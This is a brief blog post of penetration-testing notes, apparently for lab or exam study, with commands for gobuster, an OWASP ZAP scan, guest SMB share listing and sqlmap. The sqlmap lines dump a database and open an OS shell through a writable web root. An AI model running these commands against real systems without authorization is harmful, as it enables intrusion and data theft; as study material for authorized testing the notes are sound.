Post

Finding things

Posted
By Natalie Somersall
1 min read
Finding things

Tools

Gobuster

First, get some wordlists. I’ve been lazy and using the wordlists package in Kali.

1
2
3
4
5
6
7

gobuster dir \
  # specify the target and port
  -u http://domain-name-here:8000 \
  # with a big wordlist
  -w /usr/share/wordlists/dirb/big.txt \
  # but only return pdf and txt files
  -x pdf,txt

OWASP ZAP

Run OWASP ZAP full scan in a Docker container, then output the results to testreport.html.

1
2
3
4
5

docker run --rm -v $(pwd):/zap/wrk/:rw \
  -t ghcr.io/zaproxy/zaproxy:stable zap-full-scan.py \
  -t http://TARGET-NAME:PORT \
  -g gen.conf \
  -r testreport.html

smb

Once you see tcp/445 open, take a look around.

1
2
3
4
5

# list shares as guest
netexec smb [hostname/ip] -u guest -p '' --shares

# connect to a share as guest
smbclient //hostname/sharename -U guest%

sqlmap 

1
2
3
4
5
6
7
8
9
10

# dump the database
sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

# -T if you know the table you're interested in
# --threads to speed it up

# `-r` is for the post request (intercept w/ burp)
# `--os-shell`
# `--web-root` is a writable directory
sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"
This post is licensed under CC BY 4.0 by the author.